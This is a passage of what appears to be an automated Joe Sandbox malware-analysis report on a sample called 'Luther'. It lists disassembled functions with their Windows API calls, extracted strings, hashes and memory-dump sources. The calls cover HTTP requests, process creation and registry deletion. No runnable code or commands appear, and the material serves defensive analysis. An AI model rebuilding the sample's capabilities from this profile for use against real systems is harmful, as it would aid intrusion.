                                                                                                          • Opcode Fuzzy Hash: f387e205a5cb04b78eab1e60be2e030aaaa79391bfb97752f4b12670c621fe44
                                                                                                          • Instruction Fuzzy Hash: 604151B0D083196ADB109FBA8C89C6FBFE8FF44754B50452AE118F7291DA78A801CF91
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen
                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
                                                                                                          • API String ID: 176396367-2171760788
                                                                                                          • Opcode ID: 3603728a95f48794b1e7c77a9e899fe35919b000997598381c80a82bd9d9367f
                                                                                                          • Instruction ID: 71db48dc16fe006dbb143db5a9e5671b2b27728693f4216b12569aa85163f99f
                                                                                                          • Opcode Fuzzy Hash: 3603728a95f48794b1e7c77a9e899fe35919b000997598381c80a82bd9d9367f
                                                                                                          • Instruction Fuzzy Hash: 66E1D332A00616ABCF189FB4C8516EDFBB5BF54714F106129E956F7250EB30AE89C790
                                                                                                          APIs
                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00E50436
                                                                                                            • Part of subcall function 00E5045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00F0170C,00000FA0,2D966EDC,?,?,?,?,00E72733,000000FF), ref: 00E5048C
                                                                                                            • Part of subcall function 00E5045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00E72733,000000FF), ref: 00E50497
                                                                                                            • Part of subcall function 00E5045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00E72733,000000FF), ref: 00E504A8
                                                                                                            • Part of subcall function 00E5045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00E504BE
                                                                                                            • Part of subcall function 00E5045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00E504CC
                                                                                                            • Part of subcall function 00E5045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00E504DA
                                                                                                            • Part of subcall function 00E5045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E50505
                                                                                                            • Part of subcall function 00E5045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00E50510
                                                                                                          • ___scrt_fastfail.LIBCMT ref: 00E50457
                                                                                                            • Part of subcall function 00E50413: __onexit.LIBCMT ref: 00E50419
                                                                                                          Strings
                                                                                                          • InitializeConditionVariable, xrefs: 00E504B8
                                                                                                          • WakeAllConditionVariable, xrefs: 00E504D2
                                                                                                          • SleepConditionVariableCS, xrefs: 00E504C4
                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00E50492
                                                                                                          • kernel32.dll, xrefs: 00E504A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                          • API String ID: 66158676-1714406822
                                                                                                          • Opcode ID: 09965c148f37e64e4cc04833c2b584498feb2037ecd6da8a514d180ed2057ab5
                                                                                                          • Instruction ID: 805f6df182f47aeb03dca8478d5d6a30a898ea3e491b5b62a2a98696d4b77de9
                                                                                                          • Opcode Fuzzy Hash: 09965c148f37e64e4cc04833c2b584498feb2037ecd6da8a514d180ed2057ab5
                                                                                                          • Instruction Fuzzy Hash: 81213532A497046FD7216FA4AC06FA977D5EF04B63F04193AFD05F3280EB728C0A8A51
                                                                                                          APIs
                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,00ECDCD0), ref: 00EA4F6C
                                                                                                          • _wcslen.LIBCMT ref: 00EA4F80
                                                                                                          • _wcslen.LIBCMT ref: 00EA4FDE
                                                                                                          • _wcslen.LIBCMT ref: 00EA5039
                                                                                                          • _wcslen.LIBCMT ref: 00EA5084
                                                                                                          • _wcslen.LIBCMT ref: 00EA50EC
                                                                                                            • Part of subcall function 00E4FD52: _wcslen.LIBCMT ref: 00E4FD5D
                                                                                                          • GetDriveTypeW.KERNEL32(?,00EF7C10,00000061), ref: 00EA5188
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                          • Opcode ID: 447549b8d9bc854bcb67ea1dca8c0852088a1641ca24273a0eec9e144deb46d2
                                                                                                          • Instruction ID: 67dded7b9c7c3b2aeb8724ba10fa7b734f36afc99a5a785e1eac86beee10549e
                                                                                                          • Opcode Fuzzy Hash: 447549b8d9bc854bcb67ea1dca8c0852088a1641ca24273a0eec9e144deb46d2
                                                                                                          • Instruction Fuzzy Hash: EDB107726087029FC310DF28C890A7AB7E5BFAA718F50691DF596AB291D770E844C792
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00EBBBF8
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC10
                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC34
                                                                                                          • _wcslen.LIBCMT ref: 00EBBC60
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC74
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBBC96
                                                                                                          • _wcslen.LIBCMT ref: 00EBBD92
                                                                                                            • Part of subcall function 00EA0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00EA0F6D
                                                                                                          • _wcslen.LIBCMT ref: 00EBBDAB
                                                                                                          • _wcslen.LIBCMT ref: 00EBBDC6
                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EBBE16
                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00EBBE67
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00EBBE99
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBBEAA
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBBEBC
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBBECE
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00EBBF43
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2178637699-0
                                                                                                          • Opcode ID: 3bfd15624449fa9baa0f0e8569799c6d6f5ca674865ffff931d4429dca49f28f
                                                                                                          • Instruction ID: 78ea74db8474a37dc2a6a8e29e78517cb6e5a988c058b48f9bb87034e7fa35dd
                                                                                                          • Opcode Fuzzy Hash: 3bfd15624449fa9baa0f0e8569799c6d6f5ca674865ffff931d4429dca49f28f
                                                                                                          • Instruction Fuzzy Hash: BCF1CE716083409FC714EF24C995BABBBE1BF84314F14995DF885AB2A2CBB1EC45CB52
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00ECDCD0), ref: 00EB4B18
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EB4B2A
                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00ECDCD0), ref: 00EB4B4F
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00ECDCD0), ref: 00EB4B9B
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028,?,00ECDCD0), ref: 00EB4C05
                                                                                                          • SysFreeString.OLEAUT32(00000009), ref: 00EB4CBF
                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EB4D25
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00EB4D4F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                          • API String ID: 354098117-199464113
                                                                                                          • Opcode ID: ad97b1c74f4160b47f67a3dd52a8bc4041635d251504e91956d891b850527e60
                                                                                                          • Instruction ID: 5e5f44dfe51085e2c1e6b0050c0eb1ed253c2e347911c6ce913de59098fb784c
                                                                                                          • Opcode Fuzzy Hash: ad97b1c74f4160b47f67a3dd52a8bc4041635d251504e91956d891b850527e60
                                                                                                          • Instruction Fuzzy Hash: 0C121CB1A00115EFDB15DF94C884EEEBBB5FF45318F149098E905AB292D731ED46CBA0
                                                                                                          APIs
                                                                                                          • GetMenuItemCount.USER32(00F029C0), ref: 00E73F72
                                                                                                          • GetMenuItemCount.USER32(00F029C0), ref: 00E74022
                                                                                                          • GetCursorPos.USER32(?), ref: 00E74066
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 00E7406F
                                                                                                          • TrackPopupMenuEx.USER32(00F029C0,00000000,?,00000000,00000000,00000000), ref: 00E74082
                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E7408E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 36266755-4108050209
                                                                                                          • Opcode ID: a642570404ba0b17cac7cac1999ae1c9d1feed52b918cc25ca97c33f0c796086
                                                                                                          • Instruction ID: 4e5d9ef297353376eedfb2907207a53b75a7330bc21ab5b0f6785b87e1071891
                                                                                                          • Opcode Fuzzy Hash: a642570404ba0b17cac7cac1999ae1c9d1feed52b918cc25ca97c33f0c796086
                                                                                                          • Instruction Fuzzy Hash: 1F711530604205BEEB259F39DC49FEABFA4FF04368F205216F628B61D1C7B2A910D751
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000,?), ref: 00EC7823
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EC7897
                                                                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EC78B9
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC78CC
                                                                                                          • DestroyWindow.USER32(?), ref: 00EC78ED
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E30000,00000000), ref: 00EC791C
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC7935
                                                                                                          • GetDesktopWindow.USER32 ref: 00EC794E
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EC7955
                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC796D
                                                                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EC7985
                                                                                                            • Part of subcall function 00E32234: GetWindowLongW.USER32(?,000000EB), ref: 00E32242
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                          • String ID: 0$tooltips_class32
                                                                                                          • API String ID: 2429346358-3619404913
                                                                                                          • Opcode ID: 2daf46fa9eea32bfd545c40272c15f8f2a1a6222cf751de8c40dd9d0f935fdb2
                                                                                                          • Instruction ID: 8ddca4cb733831560c453ec9cc3483c9c9fd46989294543b79658301ce87cbcf
                                                                                                          • Opcode Fuzzy Hash: 2daf46fa9eea32bfd545c40272c15f8f2a1a6222cf751de8c40dd9d0f935fdb2
                                                                                                          • Instruction Fuzzy Hash: AC715470108344AFD7258F18CD48F6ABBF9FB89308F04546EF985A7261C772A946DF21
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E324B0
                                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 00EC9BA3
                                                                                                            • Part of subcall function 00EC80AE: ClientToScreen.USER32(?,?), ref: 00EC80D4
                                                                                                            • Part of subcall function 00EC80AE: GetWindowRect.USER32(?,?), ref: 00EC814A
                                                                                                            • Part of subcall function 00EC80AE: PtInRect.USER32(?,?,?), ref: 00EC815A
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9C0C
                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EC9C17
                                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EC9C3A
                                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EC9C81
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00EC9C9A
                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9CB1
                                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00EC9CD3
                                                                                                          • DragFinish.SHELL32(?), ref: 00EC9CDA
                                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00EC9DCD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                          • API String ID: 221274066-3440237614
                                                                                                          • Opcode ID: e78eca62b6d1321b96ad6970d0d81ffa8af0e0320be5fc53f3c56f535e15f69c
                                                                                                          • Instruction ID: 3da32287fb411f01d49c778746b1841c61787390e37c284ab7ac4893cc05eaa9
                                                                                                          • Opcode Fuzzy Hash: e78eca62b6d1321b96ad6970d0d81ffa8af0e0320be5fc53f3c56f535e15f69c
                                                                                                          • Instruction Fuzzy Hash: BB615F71108305AFC705DF50DC89EAFBBE8FF88750F40192DF696A21A1DB71964ACB52
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EACEF5
                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EACF08
                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EACF1C
                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EACF35
                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EACF78
                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EACF8E
                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EACF99
                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EACFC9
                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EAD021
                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EAD035
                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00EAD040
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                          • Opcode ID: bac63f7352e590c1b8007c66bbe8656a08b403eed847fb688a2b86c4aa738e37
                                                                                                          • Instruction ID: b777d7154c8029a4918f23f814734c18b4b536d861b41ed032d1d14278ad42d6
                                                                                                          • Opcode Fuzzy Hash: bac63f7352e590c1b8007c66bbe8656a08b403eed847fb688a2b86c4aa738e37
                                                                                                          • Instruction Fuzzy Hash: 8551B2B1504604BFD7218F61CC88EAB7BFDFF0D748F10542AF946AA510D736E94A9B60
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EC66D6,?,?), ref: 00EC8FEE
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC8FFE
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9009
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9016
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00EC9024
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9033
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00EC903C
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9043
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EC66D6,?,?,00000000,?), ref: 00EC9054
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ED0C04,?), ref: 00EC906D
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00EC907D
                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00EC909D
                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00EC90CD
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00EC90F5
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EC910B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3840717409-0
                                                                                                          • Opcode ID: 2dd8c538b8b45e4d8dd8176ca2609ee1499c612e491580c6724bb63056e098fb
                                                                                                          • Instruction ID: 4443fc69450fa0a2eb45fcaa425e477d61482ac1c3f4b79473fa218743489f7e
                                                                                                          • Opcode Fuzzy Hash: 2dd8c538b8b45e4d8dd8176ca2609ee1499c612e491580c6724bb63056e098fb
                                                                                                          • Instruction Fuzzy Hash: C9414871600208BFDB119F66DD8DEAABBB8FF89715F104068F905E7261D7329906CB20
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC154
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBC1D2
                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 00EBC26A
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00EBC2DE
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00EBC2FC
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EBC352
                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EBC364
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EBC382
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00EBC3E3
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EBC3F4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 146587525-4033151799
                                                                                                          • Opcode ID: a72a7cac3f8f3d6a12d26d975f6e06437448a19ce81c7f64f17eec2f023c0cbf
                                                                                                          • Instruction ID: d177ac535804968987ac627a9ba1eb4baa219b2c5b3df4daf919807a73e1fdd0
